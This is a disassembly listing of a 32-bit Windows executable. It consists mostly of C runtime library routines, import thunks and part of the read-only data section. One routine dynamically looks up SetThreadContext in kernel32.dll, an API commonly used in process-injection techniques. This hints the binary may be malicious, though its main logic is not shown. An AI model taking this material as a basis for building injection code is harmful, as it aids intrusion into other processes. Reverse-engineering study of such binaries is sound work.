loc_4027CC: ; CODE XREF: .text:004027DF�j
test eax, eax
jnz short loc_4027E1
mov ecx, [esi]
test ecx, ecx
jz short loc_4027D8
call ecx
loc_4027D8: ; CODE XREF: .text:004027D4�j
add esi, 4
loc_4027DB: ; CODE XREF: .text:004027CA�j
cmp esi, [esp+8]
jb short loc_4027CC
loc_4027E1: ; CODE XREF: .text:004027CE�j
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_40CBC0
loc_402AFF: ; CODE XREF: .text:00402B18�j
mov eax, [esi]
test eax, eax
jz short loc_402B0F
push eax
call _free
and dword ptr [esi], 0
pop ecx
loc_402B0F: ; CODE XREF: .text:00402B03�j
add esi, 4
cmp esi, offset dword_40CCC0
jl short loc_402AFF
pop esi
retn
; [0000008C BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402CAD proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_402CAD endp
; [00000088 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_get_int_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
; ---------------------------------------------------------------------------
_get_int64_arg:
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
; ---------------------------------------------------------------------------
_get_short_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
; [000007DA BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_403601 dd offset loc_403043 ; DATA XREF: __output+85�r
dd offset loc_402EB3 ; jump table for switch statement
dd offset loc_402ED0
dd offset loc_402F1C
dd offset loc_402F5D
dd offset loc_402F66
dd offset loc_402FA4
dd offset loc_403085
; ---------------------------------------------------------------------------
mov eax, offset off_40B070
retn
; [000000A6 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [00000168 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]
xor eax, eax
loc_403B4E: ; CODE XREF: .text:00403B5B�j
cmp ecx, dword_40B2F0[eax*8]
jz short loc_403B5D
inc eax
cmp eax, 13h
jb short loc_403B4E
loc_403B5D: ; CODE XREF: .text:00403B55�j
shl eax, 3
cmp ecx, dword_40B2F0[eax]
jnz short loc_403B6F
mov eax, off_40B2F4[eax]
retn
; ---------------------------------------------------------------------------
loc_403B6F: ; CODE XREF: .text:00403B66�j
xor eax, eax
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_xcptlookup:
mov ecx, dword_40B408
mov eax, offset dword_40B388
push esi
loc_403BB7: ; CODE XREF: .text:00403BCA�j
cmp [eax], edx
jz short loc_403BCC
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:40B388h[esi*4]
cmp eax, esi
jb short loc_403BB7
loc_403BCC: ; CODE XREF: .text:00403BB9�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:40B388h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_403BDF
cmp [eax], edx
jz short locret_403BE1
loc_403BDF: ; CODE XREF: .text:00403BD9�j
xor eax, eax
locret_403BE1: ; CODE XREF: .text:00403BDD�j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403D6B
push dword ptr [esp+8]
push eax
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403D6B: ; CODE XREF: .text:00403D5C�j
xor eax, eax
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041C2 proc near ; CODE XREF: start:loc_402003�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_409788
call __SEH_prolog
mov [ebp+var_1C], offset dword_409F7C
loc_4041D5: ; CODE XREF: sub_4041C2+3C�j
cmp [ebp+var_1C], offset dword_409F7C
jnb short loc_404200
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4041F6
call eax
jmp short loc_4041F6
; ---------------------------------------------------------------------------
loc_4041EF: ; DATA XREF: .rdata:stru_409788�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4041F3: ; DATA XREF: .rdata:stru_409788�o
mov esp, [ebp+ms_exc.old_esp]
loc_4041F6: ; CODE XREF: sub_4041C2+27�j
; sub_4041C2+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4041D5
; ---------------------------------------------------------------------------
loc_404200: ; CODE XREF: sub_4041C2+1A�j
call __SEH_epilog
retn
sub_4041C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_404206(void)
sub_404206 proc near ; DATA XREF: __cinit:loc_40281E�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_409798
call __SEH_prolog
mov [ebp+var_1C], offset dword_409F84
loc_404219: ; CODE XREF: sub_404206+3C�j
cmp [ebp+var_1C], offset dword_409F84
jnb short loc_404244
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_40423A
call eax
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404233: ; DATA XREF: .rdata:stru_409798�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404237: ; DATA XREF: .rdata:stru_409798�o
mov esp, [ebp+ms_exc.old_esp]
loc_40423A: ; CODE XREF: sub_404206+27�j
; sub_404206+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_404219
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_404206+1A�j
call __SEH_epilog
retn
sub_404206 endp
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__heap_term:
cmp dword_40BB84, 3
jnz short loc_404327
push ebx
xor ebx, ebx
cmp dword_40BB68, ebx
push ebp
mov ebp, ds:dword_409064
jle short loc_404315
push esi
mov esi, dword_40BB6C
push edi
mov edi, ds:dword_409090
add esi, 0Ch
loc_4042E1: ; CODE XREF: .text:00404311�j
push 4000h
push 100000h
push dword ptr [esi]
call edi
push 8000h
push 0
push dword ptr [esi]
call edi
push dword ptr [esi+4]
push 0
push dword_40BB80
call ebp
add esi, 14h
inc ebx
cmp ebx, dword_40BB68
jl short loc_4042E1
pop edi
pop esi
loc_404315: ; CODE XREF: .text:004042CE�j
push dword_40BB6C
push 0
push dword_40BB80
call ebp
pop ebp
pop ebx
loc_404327: ; CODE XREF: .text:004042BC�j
push dword_40BB80
call ds:dword_409088
retn
; ---------------------------------------------------------------------------
mov eax, dword_40BB80
retn
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_40BB64
test eax, eax
jz locret_404D9D
mov ecx, dword_40BB7C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:dword_409090
mov ecx, dword_40BB7C
mov eax, dword_40BB64
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_40BB64
mov eax, [eax+10h]
mov ecx, dword_40BB7C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_40BB64
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_40BB64
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404D44
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_40BB64
loc_404D44: ; CODE XREF: .text:00404D39�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_404D96
cmp dword_40BB68, 1
jle short loc_404D96
push dword ptr [eax+10h]
push 0
push dword_40BB80
call ds:dword_409064
mov eax, dword_40BB68
mov edx, dword_40BB6C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_40BB64
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call _memcpy_0
add esp, 0Ch
dec dword_40BB68
loc_404D96: ; CODE XREF: .text:00404D48�j
; .text:00404D51�j
and dword_40BB64, 0
locret_404D9D: ; CODE XREF: .text:00404CD4�j
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_40B87C
mov dword_40B87C, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_40B87C
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000005F BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __open_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [000001F0 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [00000116 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, off_40B59C
retn
; ---------------------------------------------------------------------------
mov eax, off_40B598
retn
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_405CBE. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_405CAA proc near ; DATA XREF: .rdata:stru_409CB0�o
xor eax, eax
inc eax
retn
sub_405CAA endp
; =============== S U B R O U T I N E =======================================
sub_405CAE proc near ; DATA XREF: .rdata:stru_409CB0�o
mov esp, [ebp-18h]
sub_405CAE endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_405CBE. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_405CBE. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000095 BYTES: COLLAPSED FUNCTION __aulldvrm. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [000002D0 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push dword ptr [esp+0Ch]
push 40h
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call __sopen
add esp, 10h
retn
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call _x_ismbbtype
add esp, 0Ch
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_getSystemCP:
and dword_40B89C, 0
cmp eax, 0FFFFFFFEh
jnz short loc_406570
mov dword_40B89C, 1
jmp ds:dword_4090B0
; ---------------------------------------------------------------------------
loc_406570: ; CODE XREF: .text:0040655E�j
cmp eax, 0FFFFFFFDh
jnz short loc_406585
mov dword_40B89C, 1
jmp ds:dword_4090AC
; ---------------------------------------------------------------------------
loc_406585: ; CODE XREF: .text:00406573�j
cmp eax, 0FFFFFFFCh
jnz short locret_406599
mov eax, dword_40B904
mov dword_40B89C, 1
locret_406599: ; CODE XREF: .text:00406588�j
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_40B6A8
jmp short loc_406A74
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [0000009F BYTES: COLLAPSED FUNCTION __lseeki64. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
___buffer_overrun:
push 0
push 1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_40B90C
mov dword_40B90C, ecx
retn
; ---------------------------------------------------------------------------
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [0000015C BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]
test ecx, ecx
jz short loc_4075CF
loc_4075C4: ; CODE XREF: .text:004075CD�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4075D0
inc eax
test ecx, ecx
jnz short loc_4075C4
loc_4075CF: ; CODE XREF: .text:004075C2�j
dec ecx
loc_4075D0: ; CODE XREF: .text:004075C8�j
mov eax, [esp+4]
sub eax, ecx
dec eax
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__chvalidator:
mov eax, [esp+4]
mov ecx, off_40B598
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+8]
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 2
jmp ds:dword_409000
; ---------------------------------------------------------------------------
jmp ds:dword_409004
; ---------------------------------------------------------------------------
jmp ds:dword_409008
; ---------------------------------------------------------------------------
jmp ds:dword_40900C
; ---------------------------------------------------------------------------
jmp ds:dword_409010
; ---------------------------------------------------------------------------
jmp ds:dword_409014
; ---------------------------------------------------------------------------
jmp ds:dword_409018
; ---------------------------------------------------------------------------
jmp ds:dword_40901C
; ---------------------------------------------------------------------------
jmp ds:dword_409020
; ---------------------------------------------------------------------------
jmp ds:dword_409024
; ---------------------------------------------------------------------------
jmp ds:dword_409028
; ---------------------------------------------------------------------------
jmp ds:dword_40902C
; ---------------------------------------------------------------------------
jmp ds:dword_409030
; ---------------------------------------------------------------------------
jmp ds:dword_409034
; ---------------------------------------------------------------------------
jmp ds:dword_409038
; ---------------------------------------------------------------------------
jmp ds:dword_40903C
; ---------------------------------------------------------------------------
jmp ds:dword_409040
; ---------------------------------------------------------------------------
jmp ds:dword_409044
; ---------------------------------------------------------------------------
jmp ds:dword_409048
; ---------------------------------------------------------------------------
jmp ds:dword_40904C
; ---------------------------------------------------------------------------
jmp ds:dword_409050
; ---------------------------------------------------------------------------
jmp ds:dword_409054
; ---------------------------------------------------------------------------
jmp ds:dword_409058
; ---------------------------------------------------------------------------
jmp ds:dword_40905C
; ---------------------------------------------------------------------------
jmp ds:dword_409060
; ---------------------------------------------------------------------------
jmp ds:dword_409064
; ---------------------------------------------------------------------------
jmp ds:dword_409068
; ---------------------------------------------------------------------------
jmp ds:dword_40906C
; ---------------------------------------------------------------------------
jmp ds:dword_409070
; ---------------------------------------------------------------------------
jmp ds:dword_409074
; ---------------------------------------------------------------------------
jmp ds:dword_409078
; ---------------------------------------------------------------------------
jmp ds:dword_40907C
; ---------------------------------------------------------------------------
jmp ds:dword_409080
; ---------------------------------------------------------------------------
jmp ds:dword_409084
; ---------------------------------------------------------------------------
jmp ds:dword_409088
; ---------------------------------------------------------------------------
jmp ds:dword_40908C
; ---------------------------------------------------------------------------
jmp ds:dword_409090
; ---------------------------------------------------------------------------
jmp ds:dword_409094
; ---------------------------------------------------------------------------
jmp ds:dword_409098
; ---------------------------------------------------------------------------
jmp ds:dword_40909C
; ---------------------------------------------------------------------------
jmp ds:dword_4090A0
; ---------------------------------------------------------------------------
jmp ds:dword_4090A4
; ---------------------------------------------------------------------------
jmp ds:dword_4090A8
; ---------------------------------------------------------------------------
jmp ds:dword_4090AC
; ---------------------------------------------------------------------------
jmp ds:dword_4090B0
; ---------------------------------------------------------------------------
jmp ds:dword_4090B4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40820A proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_4090B8
sub_40820A endp
; ---------------------------------------------------------------------------
jmp ds:dword_4090BC
; ---------------------------------------------------------------------------
jmp ds:dword_4090C0
; ---------------------------------------------------------------------------
jmp ds:dword_4090C4
; ---------------------------------------------------------------------------
jmp ds:dword_4090C8
; ---------------------------------------------------------------------------
jmp ds:dword_4090CC
; ---------------------------------------------------------------------------
jmp ds:dword_4090D0
; ---------------------------------------------------------------------------
jmp ds:dword_4090D4
; ---------------------------------------------------------------------------
jmp ds:dword_4090D8
; ---------------------------------------------------------------------------
jmp ds:dword_4090DC
; ---------------------------------------------------------------------------
jmp ds:dword_4090E0
; ---------------------------------------------------------------------------
jmp ds:dword_4090E4
; ---------------------------------------------------------------------------
jmp ds:dword_4090E8
; ---------------------------------------------------------------------------
jmp ds:dword_4090EC
; ---------------------------------------------------------------------------
jmp ds:dword_4090F0
; ---------------------------------------------------------------------------
jmp ds:dword_4090F4
; ---------------------------------------------------------------------------
jmp ds:dword_4090F8
; ---------------------------------------------------------------------------
jmp ds:dword_4090FC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408280 proc near ; DATA XREF: .data:0040B008�o
push offset aSetthreadconte ; "SetThreadContext"
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_40901C
push eax
call ds:dword_409018
mov dword_40B6F8, eax
retn
sub_408280 endp
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00001530 ( 5424.)
; Section size in file : 00001530 ( 5424.)
; Offset to raw data for section: 00009000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 409000h
dword_409000 dd 7C80B9A0h ; DATA XREF: sub_4015A0+86�r
; .text:004080F6�r
dword_409004 dd 7C8021CCh ; DATA XREF: sub_4015A0+7B�r
; .text:004080FC�r
dword_409008 dd 7C83970Dh ; DATA XREF: sub_4015A0+59�r
; .text:00408102�r
dword_40900C dd 7C802367h ; DATA XREF: sub_4015A0+36�r
; .text:00408108�r
dword_409010 dd 7C801E16h ; DATA XREF: sub_4016B0+14�r
; WinMain(x,x,x,x)+1D0�r ...
dword_409014 dd 7C809A72h ; DATA XREF: sub_4016D0+8E�r
; sub_4016D0+C9�r ...
dword_409018 dd 7C80ADA0h ; DATA XREF: sub_4016D0+60�r
; sub_4016D0+11F�r ...
dword_40901C dd 7C80B6A1h ; DATA XREF: sub_4016D0+59�r
; sub_4016D0+118�r ...
dword_409020 dd 7C801A5Dh ; DATA XREF: sub_4016D0+37�r
; .text:00408126�r
dword_409024 dd 7C8328F7h ; DATA XREF: .text:0040188D�r
; WinMain(x,x,x,x)+1B8�r ...
dword_409028 dd 7C809A51h ; DATA XREF: WinMain(x,x,x,x)+A1�r
; ___sbh_alloc_new_region+7E�r ...
dword_40902C dd 7C812782h ; DATA XREF: WinMain(x,x,x,x)+29�r
; .text:00408138�r
dword_409030 dd 7C80B4CFh ; DATA XREF: WinMain(x,x,x,x)+19�r
; __NMSG_WRITE+81�r ...
dword_409034 dd 7C801EEEh ; DATA XREF: start+160�r __ioinit+57�r ...
dword_409038 dd 7C812F1Dh ; DATA XREF: start:loc_40201C�r
; .text:0040814A�r
dword_40903C dd 7C812ADEh ; DATA XREF: start+20�r .text:00408150�r
dword_409040 dd 7C9105D4h ; DATA XREF: __heap_alloc+3E�r
; ___sbh_heap_init+D�r ...
dword_409044 dd 7C910331h ; DATA XREF: __read+8E�r __read+158�r ...
